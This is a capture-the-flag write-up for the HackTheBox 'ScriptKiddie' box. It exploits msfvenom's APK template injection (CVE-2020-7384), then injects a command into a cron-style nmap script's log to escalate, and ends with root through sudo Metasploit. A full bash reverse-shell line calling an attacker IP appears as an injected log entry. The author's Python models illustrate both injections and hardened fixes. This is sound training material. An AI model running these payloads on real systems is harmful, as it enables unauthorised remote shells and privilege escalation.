[*] INDEX:
[+] BOX INFO :
Operating System : Linux
Difficulty : Easy
Owner : 0xdf
IP : 10.10.10.226
[+] PART 1 - GAIN ACCESS
The first step is scanning the machine's ports with nmap:
PORT STATE SERVICE
22/tcp open ssh
5000/tcp open upnp
Having found the open ports, let's run a deeper scan with service and version detection:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
| 256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_ 256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Let's check the website:
Hahaha, "k1d'5 h4ck3r t00l5". Let's try each tool:
nmap ->
This one works as expected: it scans the IP we give it.
payloads ->
This one generates payloads for different targets; behind the scenes it is calling msfvenom, as we can see here:
Let's search for an exploit for msfvenom:
There is an interesting one: msfvenom can be made to execute arbitrary commands when it is given a malicious apk as a template (CVE-2020-7384), and as we saw, the payload generator accepts apk files:
But it didn't work for me (or I just didn't know how to do it), so let's search for an exploit on GitHub. In my case I found this one; running CVE-2020-7384.sh sets up our malicious apk file:
And now our apk file should be created :
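Before moving on, here is a minimal model of what CVE-2020-7384 actually does. This is an added example written for this writeup, not code from Metasploit or from the exploit script: msfvenom reads the APK template's signing certificate with keytool, takes the distinguished name from the Owner: line of that output and interpolates it, single-quoted, into a second keytool command that is run through a shell. A certificate whose CN contains a closing quote, a semicolon and a comment marker therefore runs whatever follows. The keytool output below is a constructed string and echo stands in for keytool itself, so the script runs offline; the argv-list version shows that the shell, not the certificate, is the problem.

```python
import re
import subprocess

# Constructed stand-in for `keytool -printcert -jarfile template.apk` output.
# Only the Owner: line matters for the bug; the rest is abbreviated.
BENIGN_CERT = (
    "Owner: CN=Android Debug, O=Android, C=US\n"
    "Issuer: CN=Android Debug, O=Android, C=US\n"
)
# A template signed with a certificate whose CN closes the single quote,
# runs a command (echo INJECTED stands in for the attacker's command),
# and comments out the remainder of the line.
MALICIOUS_CERT = (
    "Owner: CN=' ; echo INJECTED ; # , O=Android, C=US\n"
    "Issuer: CN=' ; echo INJECTED ; # , O=Android, C=US\n"
)


def extract_dname(cert_text):
    """Return the distinguished name from the Owner: line, as the tool does."""
    m = re.search(r"^Owner:(.+)$", cert_text, re.MULTILINE)
    if not m:
        raise ValueError("no Owner: line in keytool output")
    return m.group(1).strip()


def vulnerable_genkey(dname):
    """The bug class: interpolate the DN into a command string handed to
    `sh -c`. `echo` replaces keytool so nothing is generated; returns the
    stdout lines the shell produced."""
    cmd = f"echo keytool -genkey -dname '{dname}'"
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout.splitlines()


def hardened_genkey(dname):
    """The fix: pass the DN as one argv element. No shell is involved, so
    quotes, semicolons and '#' inside it are just bytes of the argument."""
    argv = ["echo", "keytool", "-genkey", "-dname", dname]
    out = subprocess.run(argv, capture_output=True, text=True)
    return out.stdout.splitlines()


if __name__ == "__main__":
    for label, cert in (("benign", BENIGN_CERT), ("malicious", MALICIOUS_CERT)):
        dn = extract_dname(cert)
        print(f"{label:9} vulnerable: {vulnerable_genkey(dn)}")
        print(f"{label:9} hardened:   {hardened_genkey(dn)}")
```

Running it, the vulnerable branch prints INJECTED on its own line for the malicious certificate (the quote breakout turned one keytool invocation into two statements), while the argv version prints the whole DN verbatim as a single argument.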
Let's upload this file to the victim server. But first we have to start a netcat listener on our local machine:
From our local machine :
From the victim browser :
And, as CVE-2020-7384.sh tells us at the end:
If you have access to the vulnerable machine then run:
msfvenom -x <your newly created apk> -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null
Let's set LHOST to 127.0.0.1 and upload exploit.apk as the template (the LHOST value is irrelevant here: the injected command fires while msfvenom is processing the template, and the callback address was already baked into the apk by the script) ->
Click Generate and check our netcat listener:
And we're in! To get a fully interactive shell we can run this:
script /dev/null -c bash
export SHELL=bash
export TERM=xterm-256color
stty rows 62 columns 235
[+] PART 2 - PRIVESC
[1] Escalating to Pwn
If we look inside the pwn user's home directory we can see a file called scanlosers.sh:
#!/bin/bash
log=/home/kid/logs/hackers
cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done
if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi
This is actually vulnerable to command injection: ${ip} is taken straight from the log and interpolated into a string that is run through sh -c, so we can turn a:
nmap --top-ports 10 -oN recon/10.10.10.10.nmap 10.10.10.10 2>&1 >/dev/null
into a:
nmap --top-ports 10 -oN recon/;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.18/1234 0>&1' #.nmap ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.18/1234 0>&1' # 2>&1 >/dev/null
And then we'll get a reverse shell. As you can see, we changed the whole meaning of the command: the ; ends the (now broken) nmap command, the reverse shell runs, and the # comments out the rest of the line. The script reads $log from /home/kid/logs/hackers, so we can append the command there:
echo "  ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.18/1234 0>&1' #" >> hackers
The two leading spaces matter: cut -d' ' -f3- drops the first two space-separated fields, so the payload has to start in the third field.
But first of all, let's start listening on our local machine:
Nice, we're pwn!
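To see exactly why the payload has to be shaped like that, here is a small Python model of the scanlosers.sh pipeline. It is an added example written for this writeup, not part of the box or the original post: it reproduces the `cut -d' ' -f3-` field splitting and the `read` whitespace stripping, builds the string that ends up in sh -c, and puts the two-space trick next to a hardened version that validates each entry with ipaddress and passes it to nmap as an argv element instead of through a shell. The log lines are constructed (the bracketed timestamp format is an assumption; what matters is that the IP is the third space-separated field), and `echo INJECTED` stands in for the reverse shell.

```python
import ipaddress

# Constructed sample of /home/kid/logs/hackers. The first two lines follow the
# assumed format (two fields, then the source IP). The third is the attacker's
# appended line: two leading spaces give it two empty fields, so field 3
# onward is the payload itself.
HACKERS_LOG = (
    "[2021-02-06 13:37:00] 10.10.14.18\n"
    "[2021-02-06 13:38:12] 10.10.14.18\n"
    "  ;/bin/bash -c 'echo INJECTED' #\n"
)

# The string scanlosers.sh hands to `sh -c` for each entry.
CMD_TEMPLATE = "nmap --top-ports 10 -oN recon/{ip}.nmap {ip} 2>&1 >/dev/null"


def cut_f3_onward(line):
    """`cut -d' ' -f3-`: every single space is a delimiter (adjacent spaces
    produce empty fields); a line without the delimiter is printed unchanged."""
    if " " not in line:
        return line
    return " ".join(line.split(" ")[2:])


def pipeline(log_text):
    """Model of `cat $log | cut -d' ' -f3- | sort -u | while read ip`.
    sort -u deduplicates; `read` strips leading/trailing blanks."""
    unique = sorted({cut_f3_onward(line) for line in log_text.splitlines()})
    return [entry.strip(" \t") for entry in unique]


def build_command(ip):
    """What the vulnerable script interpolates into its sh -c string."""
    return CMD_TEMPLATE.format(ip=ip)


def is_ip(value):
    """Accept only a syntactically valid IPv4/IPv6 address."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def hardened_commands(log_text):
    """The fix: validate every entry before use and never route it through a
    shell. Returns the argv lists a subprocess call would receive."""
    argvs = []
    for ip in pipeline(log_text):
        if not is_ip(ip):
            continue  # a real scanner should log and skip the bad entry
        argvs.append(["nmap", "--top-ports", "10", "-oN", f"recon/{ip}.nmap", ip])
    return argvs


if __name__ == "__main__":
    for entry in pipeline(HACKERS_LOG):
        print("entry  :", repr(entry))
        print("sh -c  :", build_command(entry))
    # With a single leading space the payload lands in field 2 and is cut off.
    print("1 space:", repr(cut_f3_onward(" ;/bin/bash -c 'echo INJECTED' #")))
    print("safe   :", hardened_commands(HACKERS_LOG))
```

The single-space variant printed at the end is the reason the echo above starts with two spaces: with one, cut yields only `-c 'echo INJECTED' #` and the semicolon that ends the nmap command never reaches the shell. The hardened loop drops the injected entry entirely and scans only 10.10.14.18.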
[2] Escalating to root
If we run sudo -l we can see this:
We can execute Metasploit as root, so let's run it with sudo and then spawn a bash from inside its console: